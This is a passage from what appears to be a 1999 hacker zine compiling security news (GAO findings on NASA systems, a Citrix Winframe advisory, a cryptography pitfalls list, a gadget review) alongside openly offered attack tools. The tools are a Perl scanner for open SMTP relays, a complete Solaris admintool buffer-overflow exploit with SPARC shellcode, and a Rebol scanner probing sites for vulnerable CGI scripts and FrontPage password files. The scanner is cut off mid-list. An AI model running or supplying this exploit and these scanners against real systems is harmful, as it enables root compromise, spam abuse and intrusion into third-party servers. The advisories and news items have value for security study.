- ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
- Instruction for authors
-
-
- ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
- We will receive proposals for presentations, workshops and tutorials
- that follow these guidelines:
-
- * The documents should be delivered by the indicated date.
-
-
- * The contents of the documents should be high-quality and
- original. It should also include an abstract that describes
- the content and style of the presentation.
-
-
- * The papers will be evaluated using the proposal, which has
- to contain:
-
-
- - title
- - format (workshop, tutorials or conference)
- - extended abstract (more than one but less than two pages)
- - requirements for the presentation (computing
- equipment, data projector, slide projector, etc.)
- - author information
- - name
- - address and affiliation
- - brief resume
- - fax and telephone number
- - e-mail address
-
-
- * For tutorials, the following information should also be
- included:
-
-
- - goal
- - introduction and summary
- - outline of the presentation
- - duration (half or full day)
- - presentation material (slides)
-
-
- ....................
- Accepted formats
- ....................
-
-
- Authors whose papers are accepted must submit the complete paper to be
- include into the C'omputo.99@mx proceedings.
-
-
- Submissions will be accepted in the following formats:
-
-
- - TeX/LaTeX
- - PostScript
- - Word for Windows
- - ASCII
- - Please contact the committee (disc99@asc.unam.mx) if
- you need to use a different format.
-
-
- Note: The specifications of the papers such as margins, font size and
- line spacing will be specified in the DISC 99 WWW page at:
-
-
- http://www.asc.unam.mx/disc99-i/convocatoria.html
-
-
-
- ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
- Program Committee
-
-
- ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
-
-
-
- President:
-
-
-
- -> Dr. Enrique Daltabuit
- Centro Tecnologico, ENEP-Aragon, UNAM
-
-
- -> M. en C. Diego Zamboni
- CERIAS, Purdue University
-
-
- -> Nicholas P. Cardo
- Lawrence Berkeley National Laboratory
- Computational Systems Group
-
-
-
- ...............
- Submissions
- ...............
-
-
- Presentations can be delivered using the following means:
-
-
- o E-mail (disc99@asc.unam.mx)
-
-
- o Post mail to the following address:
- Area de Seguridad en C'omputo
- Direcci'on General de C'omputo Acad'emico
- Circuito Exterior, Ciudad Universitaria
- 04510 M'exico, D.F.
- MEXICO
-
-
-
- <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<>
-
-
- Further Information
- -------------------
-
-
- E-mail : disc99@asc.unam.mx
-
-
- WWW : http://www.asc.unam.mx/disc99-i/convocatoria.html
-
-
- Address :
- 'Area de Seguridad en C'omputo
- Direcci'on General de C'omputo Acad'emico
- Circuito Exterior, Ciudad Universitaria
- 04510 Mexico, D.F.
- MEXICO
-
-
- Telephone Number : (52-5) 622 81 69 and (52-5) 685 22 29
- Fax : (52 5) 6 22 80 43
- Subject: DISC 99
-
-
- <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<> <>-<>
-
-
-
-
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
- Today's ISN Sponsor: OSAll [www.aviary-mag.com]
-
- @HWA
-
- 39.0 [ISN] GAO: NASA systems full of holes.
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Thu, 27 May 1999 02:56:28 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: [ISN] GAO: NASA systems full of holes.
-
-
- From: anon
-
-
- http://www.fcw.com/pubs/fcw/1999/0524/fcw-newsnasa-5-24-99.html
-
-
- MAY 24, 1999
- GAO: NASA systems full of holes
- BY DIANE FRANK (diane_frank@fcw.com)
-
-
- Out-of-date information security policies have left significant
- vulnerabilities in NASA's mission-critical systems that could allow
- unauthorized users to steal, modify or delete important operational data,
- according to a General Accounting Office report released last week.
-
-
- GAO, working over the past year with experts from the National Security
- Agency and using nothing more than public Internet access, was able to
- gain access to several unclassified mission-critical systems, including
- those supporting the command and control of spacecraft.
-
-
- According to GAO, NASA has not created enough awareness among its
- employees about common security mistakes and vulnerabilities, such as
- easily guessed passwords. NSA initially breached some systems using
- passwords such as "guest" for guest accounts and "adm" for system
- administrators, opening the door for broader access to agency systems.
-
-
- "The way we got in was through commonly known security faults," said John
- de Ferrari, assistant director of the Accounting and Information
- Management Division at GAO.
-
-
- GAO concluded that it was able to penetrate systems because NASA does not
- have a consistent information security management policy that the entire
- agency follows. "A lot of what needs to be done is awareness-related; you
- never seem to get enough awareness of computer security," de Ferrari said.
-
-
- GAO found that NASA did not have many policies regarding Internet and
- network security, and some policies the agency did have were out of date
- or were not followed.
-
-
- "We Had Become Quite Lax" "The fact of the matter is, we had become quite
- lax in the agency in terms of passwords," said Lee Holcomb, NASA's chief
- information officer. NASA now is scanning user passwords for ones that
- could be easily cracked and to check new passwords for vulnerabilities.
-
-
- "We take very seriously our responsibility for safeguarding our IT assets,
- and after Y2K, security is our No. 1 priority," Holcomb said. "They
- acknowledge that they did not succeed in penetrating several systems, but
- the fact that they did succeed is troubling to us. It is a wake-up call to
- the agency."
-
-
- This report is an important addition to the work already occurring
- throughout government to raise awareness of security needs, said Paul
- Rodgers, senior executive at the Critical Infrastructure Assurance Office,
- which is leading the national effort to protect critical systems. "The
- dangers are increasing, and we think the GAO report delivers an important
- message to NASA and other agencies," Rodgers said.
-
-
- The GAO/NSA team could not penetrate certain pockets of NASA's systems
- because network administrators either carefully controlled system access
- privileges or used patches for known operating system flaws. If expanded
- to the whole agency, such simple fixes could protect systems better
- because hackers usually will move on to systems with easily exploitable
- weaknesses, de Ferrari said.
-
-
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
- Today's ISN Sponsor: OSAll [www.aviary-mag.com]
-
- @HWA
-
- 39.1 [ISN] Nasa vulnerabilities potentially deadly
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Fri, 28 May 1999 01:12:31 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: [ISN] NASA Vulnerabilities Are Potentially Deadly
-
-
- http://www.aviary-mag.com/News/Leakage__Part_One/Leakage__Part_Two/leakage__part_two.html
-
-
- NASA Leakage -- Deadly Leakage
- By MIKE HUDACK
-
-
- 135 out of 155 NASA computer systems were found vulnerable by NSA hackers,
- reported the General Accounting Office. The GAO, however, didn┤t say what
- was contained on those systems -- they simply called them "mission
- critical." The fact is, however, that there┤s a lot more to these
- systems than NASA missions.
-
-
- "[Some NASA software has] the functionality of serving in the capacity of
- a munition's guidance system," said an anonymous source inside NASA. The
- weight of such a statement is quite obvious. "The software, however,
- would require a certain amount of modification and adaptation to
- accommodate the purpose [of nuclear weapons guidance]," the source
- continued.
-
-
- The pattern is clear: earlier this year, the world learned of espionage at
- Department of Energy laboratories in which neutron bomb technology was
- stolen. At this point, there is no evidence that guidance technology from
- NASA computers has been stolen. The fact remains, however, that China has
- a dedicated force of computer hackers who do nothing but probe US
- Government computers. Their missing NASA would be extraordinarily
- unlikely.
-
-
- The most damning evidence, reported by two anonymous NASA employees,
- states that NASA has known about security holes in its Information
- Technology facilities for more than a year. According to them, "Security
- has consistently been reduced to a reactive role in every part of the
- agency. [IT] which has long been identified as vulnerable is not
- prohibited." In fact, one went so far as to suggest that it would take a
- fundamental change of NASA leadership to create any true security at the
- Agency.
-
-
- Continued at:
- http://www.aviary-mag.com/News/Leakage__Part_One/Leakage__Part_Two/leakage__part_two.html
-
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
- Today's ISN Sponsor: OSAll [www.aviary-mag.com]
-
- @HWA
-
-
- 40.0 Citrux Winframe client for Linux vulnerability
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Fri, 28 May 1999 12:26:59 -0700
- From: David Terrell <dbt@meat.net>
- To: BUGTRAQ@netspace.org
- Subject: Citrix Winframe client for Linux
-
- [ presumably this holds true for the other unix clients as well, but
- all I have is linux to test on ]
-
- The Citrix Winframe linux client (used for accessing Winframe and
- Windows NT Server Terminal Edition) has a simple configuration section.
- Perhaps too simple.... All configuration information is stored in a
- directory /usr/lib/ICAClient/config which is mode 777. This in and
- of itself is bad news, since any user on the system can overwrite
- configuration data.
-
- The situation is actually much worse than that.
-
- When you start up the actual session manager (wfcmgr) you get a listbox
- of configured sessions. The data for this listbox is stored in the mode
- 777 file /usr/lib/ICAClient/config/appsrv.ini. So there's a single
- config file shared between all users. A sample session profile follows:
-
- [WFClient]
- Version=1
-
- [ApplicationServers]
- broken=
-
- [broken]
- WinStationDriver=ICA 3.0
- TransportDriver=TCP/IP
- DesiredColor=2
- Password=0006f6c601930785
- Domain=NTDOM
- Username=user
- Address=hostname
-
- Yep. Passwords are stored in some kind of hash. What that hash is doesn't
- really matter since you can just bring up wfcmgr and log in as that user.
-
- Terrible.
-
- I tried mailing both support@citrix.com and security@citrix.com but
- neither of these addresses exist.
-
-
- Workaround? wfcmgr supports the -icaroot parameter, but you basically
- need to copy all the files in for it to work. So duplicate the tree in
- your home directory, fix permissions, and do wfcmgr -icaroot $HOME/.ica.
-
- Alternatively, don't use it.
-
- Distressing that the company that was "bringing multiuser concurrent logons
- to Windows NT" makes such a little effort at understanding multiuser
- security.... [further editorialization left to the reader]
-
- --
- David Terrell
- dbt@meat.net, dbt@nebcorp.com I may or may not be speaking for Nebcorp,
- http://wwn.nebcorp.com/~dbt/ but Nebcorp has spoken for you.
-
- @HWA
-
- 41.0 [ISN] Top 10 candidates for a "duh" list (general sec/crypto)
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Fri, 28 May 1999 20:16:42 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: [ISN] Top 10 candidates for a "duh" list (general sec/crypto)
- Message-ID: <Pine.SUN.3.96.990528201424.23867K-100000@flatland.dimensional.com>
-
-
-
- [Very good run-down on what isn't acceptable crypto. - Jay]
-
-
- Forwarded From: "Jay D. Dyson" <jdyson@techreports.jpl.nasa.gov>
- Originally From: "Arnold G. Reinhold" <reinhold@world.std.com>
- Courtesy of Cryptography List.
-
-
-
- At 1:36 PM -0400 5/27/99, Kawika Daguio wrote:
- What I would like to know from you is whether you and others have been
- able to construct a "duh" list of typical, but unacceptable current
- practices that can easily be remediated.
-
-
- Here are my top 10 candidates for a "duh" list:
-
-
- 1. Keys that are too short: Anything less than 80 bits for symmetric
- ciphers (128-bits prefered), or 1024 bits for integer-based public key
- systems. In particular this precludes use of 56-bit DES. (112-bit 3DES is
- fine.)
-
-
- 2. Poor quality random number generation. Random quantities are needed at
- many places in the operation of a modern cryptographic security system. If
- the source of randomness is weak, the entire system can be compromised.
-
-
- 3. Use of short passwords or weak passphrases to protect private keys or,
- worse, using them to generate symmetric keys. Bad passphrase advice
- abounds. For example, both Netscape and Microsoft advise using short
- passwords to protect private keys stored by their browsers. The simple fix
- is to use randomly generated passphrases of sufficient length. See
- http://www.hayom.com/diceware.html.
-
-
- 4. Re-use of the same key with a stream cipher. I have seen this done many
- times with RC4. Even Microsoft appears to have gotten this wrong with
- their VPN (I do not know if it has been fixed). There are simple
- techniques to avoid this problem but they are often ignored. See
- http://ciphersaber.gurus.com for one method. The potential for slipping up
- in stream cipher implimentation makes a strong case for using modern block
- ciphers wherever possible.
-
-
- 5. Using systems based on encryption techniques that have not been
- publically disclosed and reviewed. There are more than enough ciphers and
- public key systems out there that have undergone public scrutiny. Many of
- the best are now in the public domain: 3DES, Blowfish, Skipjack, Arcfour,
- D-H, DSA. Others, e.g. RSA, IDEA can be licensed.
-
-
- 6. Ignoring physical security requirements for high value keys. In
- particular, no secret key is safe if it is used on a personal computer to
- which someone who is not trusted can gain physical access.
-
-
- 7. Lack of thorough configuration management for cryptographic software.
- The best software in the world won't protect you if you cannot guarantee
- that the version you approved is the version being executed.
-
-
- 8. Poor human interface design. Cryptographic systems that are too hard to
- use will be ignored, sabotaged or bypassed. Training helps, but cannot
- overcome a bad design.
-
-
- 9. Failure to motivate key employees. Action or inaction, deliberate of
- inadvertent, by trusted individuals can render any security system worse
- than worthless. David Kahn once commented that no nation's communications
- are safe as long as their code clerks are at the bottom of the pay scale.
-
-
- 10. Listening to salesmen. Any company that is selling cryptographic
- products has a good story for why the holes in their product really do not
- matter. Make sure the system you deploy is reviewed by independent
- experts.
-
-
-
- Arnold Reinhold
-
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
- Today's ISN Sponsor: OSAll [www.aviary-mag.com]
-
- @HWA
-
- 42.0 Seeing invisible fields and avoiding them...
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Contributed by Twstdpair (Source: MSNBC)
-
- See invisible fields - and avoid them
-
- The Micro Alert Alarm for detecting
- radio/microwaves
-
- May 28 - Earlier this week, a news story I read troubled me greatly. It told about a
- European study that linked cellular phone use to an increased incidence of brain
- tumors. For me, and millions of other cell phone junkies, this is a very scary thought.
- If the study is true, I could stop using my phones to minimize risks, or find out just
- how much "pollution" my devices are creating. THAT'S WHERE THE PEOPLE from AlphaLab Inc.
- come in. Someone there read a column I did on a cell phone antenna add-on that claimed
- to take the signal and move it away from your head. AlphaLab's David told me the company
- made a tiny device that could detect what your phone was really doing. I jumped at
- the chance to play with one.
-
- The Micro Alert Alarm is just what it says it is. It's a matchbox-sized device(2.25 inches
- by 1.6 inches by 0.75inches) that will (and I quote) "find what's emitting radio or
- microwaves,whether in hidden locations or in plainsight." The alarm puts forth a loud
- (annoying) beep when radio waves stronger than the level you select are present. If you
- move closer to the source of the RF-emitting device, the beeps will ultimately become a
- solid tone (more annoying). As you move away from the source, the beeping will stop
- altogether (thankfully).
-
- The alarm runs on a tiny battery that lasts three years or so. At its highest
- sensitivity, it should detect a typical cellular phone tower a half-mile away. Or an
- analog cellular phone 40 feet away. Or a digital phone at 20 feet. Or a microwave oven
- that's in use 10 to 50 feet away. To send the Micro Alert Alarm into nearly constant fits,
- unscrew the back and open one side. The sensitivity goes off the chart. In that mode, you
- can see if someone has bugged a room (anong other things). The price for this little
- marvel? $81.50, plus shipping and handling.
-
- Does it work? You bet. Actually, sometimes it works too well. The most important part of
- working this device is setting it to your location. It can be very sensitive. I really
- couldn't test it at MSNBC. Way too many TV monitors, computer monitors and all sorts of
- broadcasting stuff around. And I couldn't really test it at home in Lower Manhattan. An
- old friend, Joe Sand, while helping me install an antenna on my roof, told me I lived
- so close to the broadcast antennas on the World Trade Center, that if someone made
- sunglasses that detected radio waves, it would look as if I lived inside a tornado. He
- was right. The alarm was nearly impossible to adjust at the "normal" setting. And it
- never stopped beeping when set on "high" sensitivity. I did have better luck out at the
- Eastern Long Island test center. There I was able to adjust everything to my liking. I
- found that the Micro Alert Alarm didn't like microwave ovens or TV sets or computer
- monitors - all from a few feet away. Cellular phones (one-third-watt output) set off the
- beeping from about three to five feet away and my Blackberry beeper (2 watts of
- transmitting power) did the same from about one to two feet away. Not what AlphaLab
- claims, but who knows if I ever really maximized all the settings. Is it worth it? That
- depends. If you're the paranoid type, buy one today. I couldn't reference just how
- scientifically accurate it is, but under favorable conditions it did detect
- those invisible radio waves that could be dangerous to our health. Might turn out to be a
- good gift for someone with a pacemaker. On the other hand, a Micro Alert Alarm is said to
- find surveillance "bugs," detect police radar, leaky microwave ovens, fluorescent
- lighting, electric typewriters and copy machines! Finally, you can take AlphaLab's
- advice and switch on your Micro Alert Alarm and put it in your pocket when you go out.
- If someone switches on a cell phone and sets off your alarm, you can kindly ask them
- to move away and stop polluting your personal space. Cool!
-
- @HWA
-
-
- 43.0 RelayCheck v1.0 scan for smtp servers that will relay mail.
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml
-
- #!/usr/bin/perl
- ##############################################
- # #
- # RelayCheck v1.0 #
- # Written By: Epicurus (epicurus@wilter.com) #
- # #
- # Purpose: To scan a list of SMTP servers to #
- # find servers that will relay e-mail. There #
- # are many reasons why one might need such a #
- # list of SMTP servers. #
- # #
- # Usage: #
- # Create a list of hosts which you want to #
- # scan. One host per line. Then run this #
- # script. #
- # #
- ##############################################
- use Socket;
-
- print "RelayCheck v1.0\n";
- print "Written By: Epicurus (epicurus\@wilter.com)\n\n";
-
- print "Host List: ";
- chomp($host_list=<STDIN>);
-
- print "HELO Domain: ";
- chomp($helo_domain=<STDIN>);
-
- print "Attempt From: ";
- chomp($from=<STDIN>);
-
- print "Attempt To: ";
- chomp($to=<STDIN>);
-
- print "Log Session?(y/n)";
- $yn=<STDIN>;
-
- if($yn =~ /y/i)
- {
- $log = 1;
- $logfile="relay.log";
-
- print "Log File [$logfile]: ";
- $file=<STDIN>;
- chop($file) if $file =~ /\n$/;
-
- if($file ne "")
- {
- $logfile=$file;
- }
- open(LOG,">>$logfile") || die("Unable to write to $logfile!");
- print LOG "RelayCheck Scan:\n\n";
- }
-
- ##############################################
-
- $helo_string = "HELO $helo_domain\r\n";
- $mail_from = "MAIL FROM: <$from>\r\n";
- $rcpt_to = "RCPT TO: <$to>\r\n";
- $port = 25;
-
- $found=0;
- $i=0;
- open(HOSTS,"$host_list") || die $!;
- while(<HOSTS>)
- {
- chop($_) if $_ =~ /\n$/;
- $remote=$_;
- $print_remote = $remote;
- $print_remote .= "." while(length($print_remote) < 38);
- $print_remote .= ": ";
- print "$print_remote";
- print LOG "$print_remote" if($log==1);
- &send_mail;
- $i++;
- }
- close(HOSTS);
-
- print "\nFinished Scanning. $found out of $i hosts will relay.\n\n";
- print LOG "\nFinished Scanning. $found out of $i hosts will relay.\n\n" if($log==1);
- close(LOG);
-
-
- sub send_mail
- {
- if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
- die("No port specified.") unless $port;
- $iaddr = inet_aton($remote) || die("Failed to find host: $remote");
- $paddr = sockaddr_in($port, $iaddr);
- $proto = getprotobyname('tcp');
- socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
- connect(SOCK, $paddr) || die("Unable to connect: $!");
-
- $smtp=<SOCK>;
- if($smtp =~ /^220 /)
- {
- send(SOCK,$helo_string,0);
- }
-
- $smtp=<SOCK>;
- if($smtp =~ /^250 /)
- {
- send(SOCK,$mail_from,0);
- }
-
- $smtp=<SOCK>;
- if($smtp =~ /^250 /)
- {
- send(SOCK,$rcpt_to,0);
- }
-
- $smtp=<SOCK>;
- if($smtp =~ /^250 /)
- {
- $found++;
- print "relaying allowed\n";
- print LOG "relaying allowed\n" if($log==1);
- }
- else
- {
- print "no relaying\n";
- print LOG "no relaying\n" if($log==1);
- }
-
- send(SOCK,"QUIT\r\n",0);
- close(SOCK);
- }
-
- @HWA
-
- 44.0 Admintool exploit for Solaris (Updated) by Shadow Penguin Security
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml
-
- /*=============================================================================
- admintool Overflow Exploits( Solaris2.6 and 7 for Sparc Edition)
- The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
- Written by UNYUN (unewn4th@usa.net)
- [usage]
- % setenv DISPLAY=yourdisplay:0.0
- % gcc ex_admintool.c (This example program)
- % a.out
- ( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk]
- -> Directory: /tmp -> [Ok] )
- #
-
- In /tmp/EXP directory, the temp files are made, please remove it.
- =============================================================================
- */
-
- #include <stdio.h>
- #include <sys/utsname.h>
-
- #define ADJUST1 2
- #define ADJUST2 1
- #define BUFSIZE1 1000
- #define BUFSIZE2 800
- #define OFFSET 3600
- #define OFFSET2 400
-
- #define PKGDIR "mkdir /tmp/EXP"
- #define PKGINFO "/tmp/EXP/pkginfo"
- #define PKGMAP "/tmp/EXP/pkgmap"
-
- #define NOP 0xa61cc013
-
- char exploit_code[] =
- "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
- "\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
- "\x94\x10\x20\x10\x94\x22\xa0\x10"
- "\x9c\x03\xa0\x14"
- "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
- "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
- "\x91\xd0\x20\x08"
- ;
-
- unsigned long get_sp(void)
- {
- __asm__("mov %sp,%i0 \n");
- }
-
- unsigned long ret_adr;
- static char x[500000];
- FILE *fp;
- int i,vofs=0;
- struct utsname name;
- main()
- {
- uname(&name);
- if (strcmp(name.release,"5.7")==0) vofs=-904;
-
- system(PKGDIR);
- putenv("LANG=");
- if ((fp=fopen(PKGMAP,"wb"))==NULL){
- printf("Can not write '%s'\n",PKGMAP);
- exit(1);
- }
- fclose(fp);
-
- if ((fp=fopen(PKGINFO,"wb"))==NULL){
- printf("Can not write '%s'\n",PKGINFO);
- exit(1);
- }
- fprintf(fp,"PKG=");
-
- ret_adr=get_sp()-OFFSET+vofs;
- while ((ret_adr & 0xff000000) == 0 ||
- (ret_adr & 0x00ff0000) == 0 ||
- (ret_adr & 0x0000ff00) == 0 ||
- (ret_adr & 0x000000ff) == 0)
- ret_adr += 4;
-
- printf("Jumping address = %lx\n",ret_adr);
- memset(x,'a',4);
- for (i = ADJUST1; i < 1000; i+=4){
- x[i+3]=ret_adr & 0xff;
- x[i+2]=(ret_adr >>8 ) &0xff;
- x[i+1]=(ret_adr >> 16 ) &0xff;
- x[i+0]=(ret_adr >> 24 ) &0xff;
- }
- x[BUFSIZE1]=0;
- fputs(x,fp);
- fprintf(fp,"\n");
-
- fprintf(fp,"NAME=");
- memset(x,'a',4);
- for (i = ADJUST2; i < BUFSIZE2; i+=4){
- x[i+3]=NOP & 0xff;
- x[i+2]=(NOP >> 8 ) &0xff;
- x[i+1]=(NOP >> 16 ) &0xff;
- x[i+0]=(NOP >> 24 ) &0xff;
- }
- for (i=0; i<strlen(exploit_code); i++)
- x[i+ADJUST2+OFFSET2]=exploit_code[i];
- x[BUFSIZE2]=0;
- fputs(x,fp);
- fprintf(fp,"\n");
-
- fprintf(fp,"VERSION=1.00\n");
- fprintf(fp,"ARCH=sparc\n");
- fprintf(fp,"CLASSES=none\n");
- fprintf(fp,"CATEGORY=application\n");
- fprintf(fp,"PSTAMP=990721\n");
- fprintf(fp,"BASEDIR=/\n");
- fclose(fp);
- system("admintool");
- }
-
-
- @HWA
-
- 45.0 AppManager 2.0 for NT from NetIQ displays passwords in cleartext
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml
-
- AppManager 2.0 from NetIQ displays passwords in clear text!
-
- AppManager is a product which enables an enterprise to monitor the performance and
- availability of Windows NT server services such as Exchange, SQL, etc. It does this
- via an agent on the target machine which reports back to a console. The agents monitor
- for things like low disk space, misbehaving services, and so on. Like most products that
- follow a manager/agent architecture, the agents must use an account with Administrator
- privileges in order to do their job. The problem is that when the authentication occurs,
- the userid and password are passed in clear text, meaning that anyone with a sniffer can
- read it as it goes across the wire.
-
- The other problem is that when someone with access to the AppManager console goes to look
- at a job, all he or she must do is right-click on the job, select Properties, select the
- View tab, and voila! The userid and password that the job is using is right there for all
- to see. With version 3.0 they have replaced the password with asterisks, but the company
- conceded that if someone were to copy the asterisks and paste them into a text file then the
- password would be displayed instead of the asterisks! More security through obscurity.
-
- The only fix so far is for an AppManager administrator to go into the Properties and
- manually backspace over the password to remove it. Once this is done it will not appear
- again on any of the consoles. However, if an "agent installation" job is run, the password
- WILL be displayed in Properties, but only for the duration on the install, which is usually
- between ten and fifteen minutes. There is currently no way to prevent this.
-
- According to the company this is a "known issue." After some more discussion I found that
- they have known about this for two years, yet apparently have not done anything to rectify
- it. They said that encrypting the authentication sequence traffic is difficult to do
- which is one of the reasons why they haven't fixed it yet. If their programmers can't
- figure out in two years how to encrypt traffic then I think a another product should be
- chosen.
-
- -- Anonymous
-
-
- @HWA
-
-
- 46.0 Cgichck99 ported to Rebol from Su1d Sh3ll's .c code
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- REBOL [ Title: "CGI Check 99"
- Date: 27-May-1999 Author: "deepquest 98% by loser"
- Comment: "respect and source from loser"
- File: %cgi-check99.r
- Email: deepquest@netscape.net
- Purpose: { Popular CGI scanner ported and improved to REBOL. }]
- secure none
- print "CGI Scanner. Ported by loser improved by deepquest."
- prin "Site to scan: "
- site: input
- a: exists? join http:// [ site "/cgi-bin/rwwwshell.pl " ]
- if a == yes [ print "THC - Backdoor" ]
- b: exists? join http:// [ site "/cgi-bin/phf " ]
- if b == yes [ print "PHF" ]
- c: exists? join http:// [ site "/cgi-bin/Count.cgi " ]
- if c == yes [ print "Count.cgi" ]
- d: exists? join http:// [ site "/cgi-bin/test.cgi " ]
- if d == yes [ print "test-cgi" ]
- e: exists? join http:// [ site "/cgi-bin/nph-test-cgi " ]
- if e == yes [ print "nhp-test-cgi " ]
- f: exists? join http:// [ site "/cgi-bin/nph-publish " ]
- if f == yes [ print "nph-publish" ]
- g: exists? join http:// [ site "/cgi-bin/php.cgi " ]
- if g == yes [ print "PHP" ]
- h: exists? join http:// [ site "/cgi-bin/handler " ]
- if h == yes [ print "handler" ]
- i: exists? join http:// [ site "/cgi-bin/webgais " ]if
- i == yes [ print "webgais" ]
- j: exists? join http:// [ site "/cgi-bin/websendmail " ]
- if j == yes [ print "websendmail" ]
- k: exists? join http:// [ site "/cgi-bin/webdist.cgi " ]
- if k == yes [ print "webdist.cgi" ]
- l: exists? join http:// [ site "/cgi-bin/faxsurvey " ]
- if l == yes [ print "faxsurvey" ]
- m: exists? join http:// [ site "/cgi-bin/htmlscript " ]
- if m == yes [ print "htmlscript" ]
- n: exists? join http:// [ site "/cgi-bin/pfdisplay.cgi" ]
- if n == yes [ print "pfdisplay" ]
- o: exists? join http:// [ site "/cgi-bin/perl.exe" ]
- if o == yes [ print "perl.exe" ]
- p: exists? join http:// [ site "/cgi-bin/wwwboard.pl" ]
- if p == yes [ print "wwwboard.pl" ]
- q: exists? join http:// [ site "/cgi-bin/www-sql " ]
- if q == yes [ print "www-sql" ]
- r: exists? join http:// [ site "/cgi-bin/view-source " ]
- if r == yes [ print "view-source" ]
- s: exists? join http:// [ site "/cgi-bin/campas " ]
- if s == yes [ print "campas" ]
- t: exists? join http:// [ site "/cgi-bin/aglimpse " ]
- if t == yes [ print "aglimpse" ]
- u: exists? join http:// [ site "/cgi-bin/glimpse " ]
- if u == yes [ print "glimpse" ]
- v: exists? join http:// [ site "/cgi-bin/man.sh " ]
- if v == yes [ print "man.sh" ]
- w: exists? join http:// [ site "/cgi-bin/AT-admin.cgi " ]
- if w == yes [ print "AT-admin.cgi" ]
- x: exists? join http:// [ site "/cgi-bin/filemail.pl " ]
- if x == yes [ print "filemail.pl" ]
- y: exists? join http:// [ site "/cgi-bin/maillist.pl " ]
- if y == yes [ print "maillist.pl" ]
- z: exists? join http:// [ site "/cgi-bin/jj " ]
- if z == yes [ print "jj" ]
- aa: exists? join http:// [ site "/cgi-bin/info2www " ]
- if aa == yes [ print "info2www" ]
- bb: exists? join http:// [ site "/cgi-bin/files.pl " ]if
- bb == yes [ print "files.pl" ]
- cc: exists? join http:// [ site "/cgi-bin/finger " ]
- if cc == yes [ print "finger" ]
- dd: exists? join http:// [ site "/cgi-bin/bnbform.cgi " ]
- if dd == yes [ print "bnbform.cgi" ]
- ee: exists? join http:// [ site "/cgi-bin/survey.cgi " ]
- if ee == yes [ print "survey.cgi" ]
- ff: exists? join http:// [ site "/cgi-bin/AnyForm2 " ]
- if ff == yes [ print "AnyForm2" ]
- gg: exists? join http:// [ site "/cgi-bin/textcounter.pl " ]
- if gg == yes [ print "textcounter.pl" ]
- hh: exists? join http:// [ site "/cgi-bin/classifieds.cgi " ]
- if hh == yes [ print "classifieds.cgi" ]
- ii: exists? join http:// [ site "/cgi-bin/environ.cgi " ]
- if ii == yes [ print "environ.cgi" ]
- jj: exists? join http:// [ site "/cgi-bin/wrap " ]
- if jj == yes [ print "wrap" ]
- kk: exists? join http:// [ site "/cgi-bin/cgiwrap " ]
- if kk == yes [ print "cgiwrap" ]
- ll: exists? join http:// [ site "/cgi-bin/guestbook.cgi " ]
- if ll == yes [ print "guestbook.cgi" ]
- mm: exists? join http:// [ site "/cgi-bin/edit.pl " ]
- if mm == yes [ print "edit.pl" ]
- nn: exists? join http:// [ site "/cgi-bin/perlshop.cgi " ]
- if nn == yes [ print "perlshop.cgi" ]
- oo: exists? join http:// [ site "/_vti_inf.html " ]
- if oo == yes [ print "_vti_inf.html" ]
- pp: exists? join http:// [ site "/_vti_pvt/service.pwd " ]
- if pp == yes [ print "service.pwd" ]
- qq: exists? join http:// [ site "/_vti_pvt/users.pwd " ]
- if qq == yes [ print "users.pwd" ]
- rr: exists? join http:// [ site "/_vti_pvt/authors.pwd" ]
- if rr == yes [ print "authors.pwd" ]
- ss: exists? join http:// [ site "/_vti_pvt/administrators.pwd " ]
